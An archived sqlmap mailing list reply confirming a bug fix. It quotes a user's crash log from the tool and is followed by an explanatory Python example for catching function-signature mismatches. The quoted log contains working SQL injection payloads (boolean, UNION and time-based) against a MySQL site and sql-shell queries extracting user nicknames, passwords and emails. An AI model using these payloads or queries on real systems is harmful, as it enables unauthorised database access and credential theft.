Re: [sqlmap-users] Bug Found in sql-shell!
From: Miroslav S. <mir...@gm...> - 2012-04-04 23:17:02
Hi Marco.

Thank you for your report and find it fixed with the latest r4969 commit.

Kind regards,
Miroslav Stampar

On Wed, Apr 4, 2012 at 10:19 PM, Marco Mirandola <mm...@gm...> wrote:
> [22:15:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
> [22:15:51] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
> ---
> Place: GET
> Parameter: id
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: id=12' AND 7690=7690 AND 'coUR'='coUR
>
>     Type: UNION query
>     Title: MySQL UNION query (NULL) - 2 columns
>     Payload: id=12' UNION ALL SELECT NULL, CONCAT(0x3a6e617a3a,0x61476a577a7053536676,0x3a6f61623a)# AND 'vhgF'='vhgF
>
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: id=12' AND SLEEP(5) AND 'oxZQ'='oxZQ
> ---
>
> [22:15:51] [INFO] the back-end DBMS is MySQL
> web application technology: Apache
> back-end DBMS: MySQL 5.0.11
> [22:15:51] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
> sql-shell> select nick, pws from utenti
> [22:15:56] [INFO] fetching SQL SELECT statement query output: 'select nick, pws from utenti'
> select nick, pws from utenti:    'None'
>
> sql-shell> select nick, pws from utenti
> [22:16:08] [INFO] fetching SQL SELECT statement query output: 'select nick, pws from utenti'
> select nick, pws from utenti:    'None'
>
> sql-shell> select nick, pws, mail from utenti
> [22:16:32] [INFO] fetching SQL SELECT statement query output: 'select nick, pws, mail from utenti'
> [22:16:32] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
> [22:16:32] [INFO] resumed: 4
> the SQL query provided can return 4 entries. How many entries do you want to retrieve?
> [a] All (default)
> [#] Specific number
> [q] Quit
> > a
> [22:16:36] [INFO] retrieving the length of query output
> [22:16:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev
> Python version: 2.7.2
> Operating system: nt
> Command line: P:\SQl INJECTION\sqlmap\sqlmap.py -u ***************************** *********************** --sql-shell --threads=5
> Technique: BOOLEAN
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "P:\SQl INJECTION\sqlmap\_sqlmap.py", line 82, in main
>     start()
>   File "P:\SQl INJECTION\sqlmap\lib\controller\controller.py", line 573, in start
>     action()
>   File "P:\SQl INJECTION\sqlmap\lib\controller\action.py", line 121, in action
>     conf.dbmsHandler.sqlShell()
>   File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line 2451, in sqlShell
>     output = self.sqlQuery(query)
>   File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line 2397, in sqlQuery
>     output = inject.getValue(query, fromUser=True)
>   File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 439, in getValue
>     value = __goInferenceProxy(query, fromUser, expected, batch, unpack, charsetType, firstChar, lastChar, dump)
>   File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 306, in __goInferenceProxy
>     output = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
>   File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 115, in __goInferenceFields
>     output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump)
>   File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 70, in __goInference
>     _, length, _ = queryOutputLength(expression, payload)
>   File "P:\SQl INJECTION\sqlmap\lib\utils\resume.py", line 74, in queryOutputLength
>     count, length = bisection(payload, lengthExprUnescaped, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
> TypeError: bisection() got an unexpected keyword argument 'expected'
>
> [*] shutting down at 22:16:36

--
Miroslav Stampar
http://about.me/stamparm
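The traceback in the quoted report ends in `bisection()` rejecting the keyword `expected=`: a call site in one module had grown an argument that the callee in another module did not yet accept, and nothing caught it until that code path ran. The following is an added example, not sqlmap's code and not anything from this thread. It uses hypothetical stand-ins (`bisection_old`, `bisection_new`, `CALLER_KWARGS`) to model that kind of drift and shows how `inspect.signature(...).bind()` reproduces the interpreter's argument matching without executing the function, so a unit test can flag the mismatch before a user hits it at runtime.

```python
import inspect
from typing import Callable, Optional

# Hypothetical stand-ins for this example; not sqlmap's real functions or signatures.
def bisection_old(payload, expression, charsetType=None):
    """Callee as it stood before the caller started passing a new keyword."""
    return (1, len(expression))

def bisection_new(payload, expression, expected=None, charsetType=None):
    """Callee after the fix: it now accepts `expected` as well."""
    return (1, len(expression))

# Keyword arguments the caller passes; constructed values for this example only.
CALLER_KWARGS = {"expected": "int", "charsetType": "digits"}

def find_signature_mismatch(func: Callable, *args, **kwargs) -> Optional[str]:
    """Return None if `func` would accept this call, else the bind error text.

    Signature.bind applies the same positional/keyword matching rules the
    interpreter uses at call time, but never runs the function body, so it
    is safe to use in a test suite against code that does real work.
    """
    try:
        inspect.signature(func).bind(*args, **kwargs)
    except TypeError as exc:
        return str(exc)
    return None

def check_call(func: Callable) -> Optional[str]:
    """Check the specific call shape the (hypothetical) caller uses."""
    return find_signature_mismatch(func, "payload", "LENGTH(x)", **CALLER_KWARGS)

def call_length_query(func: Callable):
    """Perform the real call; raises TypeError if the signature has drifted."""
    count, length = func("payload", "LENGTH(x)", **CALLER_KWARGS)
    return count, length

def call_drifts(func: Callable) -> bool:
    """True if actually making the call raises TypeError, as in the report."""
    try:
        call_length_query(func)
    except TypeError:
        return True
    return False

if __name__ == "__main__":
    # The old callee is rejected at bind time with the same message the
    # traceback shows; the fixed callee binds cleanly.
    print("old callee:", check_call(bisection_old))
    print("new callee:", check_call(bisection_new))
```

The useful property is that `check_call` fails in a test run even when the code path is only reached after a long interactive session, which is exactly when the report above hit it.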